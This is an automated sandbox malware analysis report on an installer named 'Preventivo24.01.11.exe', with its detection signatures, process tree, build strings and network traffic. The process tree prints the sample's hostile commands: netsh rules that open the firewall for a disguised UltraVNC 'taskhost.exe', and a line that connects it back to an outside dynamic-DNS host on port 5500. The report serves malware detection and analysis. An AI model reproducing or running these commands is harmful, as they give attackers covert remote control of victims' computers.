Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name:Preventivo24.01.11.exe
Analysis ID:1379424
MD5:32f35b78a3dc5949ce3c99f2981def6b
SHA1:18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionalty to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Preventivo24.01.11.exe (PID: 5924 cmdline: C:\Users\user\Desktop\Preventivo24.01.11.exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B)
    • msiexec.exe (PID: 7216 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI=" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • viewer.exe (PID: 7424 cmdline: C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
    • cmd.exe (PID: 7468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • reg.exe (PID: 7576 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WMIC.exe (PID: 7592 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
      • findstr.exe (PID: 7600 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • Acrobat.exe (PID: 7676 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7212 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • viewer.exe (PID: 7704 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
        • cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • mode.com (PID: 8000 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
          • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • reg.exe (PID: 7804 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 7804 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • mode.com (PID: 2840 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)
            • netsh.exe (PID: 2132 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • netsh.exe (PID: 5924 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • WMIC.exe (PID: 8216 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • findstr.exe (PID: 8244 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • taskhost.exe (PID: 8488 cmdline: C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run MD5: 663FE548A57BBD487144EC8226A7A549)
          • viewer.exe (PID: 8508 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
            • cmd.exe (PID: 8600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • viewer.exe (PID: 8516 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)
            • cmd.exe (PID: 8608 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 8704 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 8724 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • reg.exe (PID: 8740 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • timeout.exe (PID: 8540 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 8960 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 9108 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 2840 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • timeout.exe (PID: 8456 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7800 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7968 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 736 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 888 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8004 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 8400 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8444 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308
SID:2834928
Source Port:49705
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Preventivo24.01.11.exeVirustotal: Detection: 17%Perma Link
Source: Preventivo24.01.11.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Preventivo24.01.11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: c:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FE3210 FindFirstFileW,FindClose,0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF3C10 FindFirstFileW,FindClose,0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,0_2_00FCBFF0
Source: C:\Games\taskhost.exeCode function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,41_2_000BEC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,0_2_00FF2400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmdJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmdJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txtJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dllJump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\Jump to behavior

Networking

barindex
Source: TrafficSnort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80
Source: global trafficTCP traffic: 192.168.2.4:49749 -> 140.228.29.110:5500
Source: Joe Sandbox ViewIP Address: 52.202.204.11 52.202.204.11
Source: Joe Sandbox ViewIP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox ViewIP Address: 93.184.216.34 93.184.216.34
Source: global trafficHTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
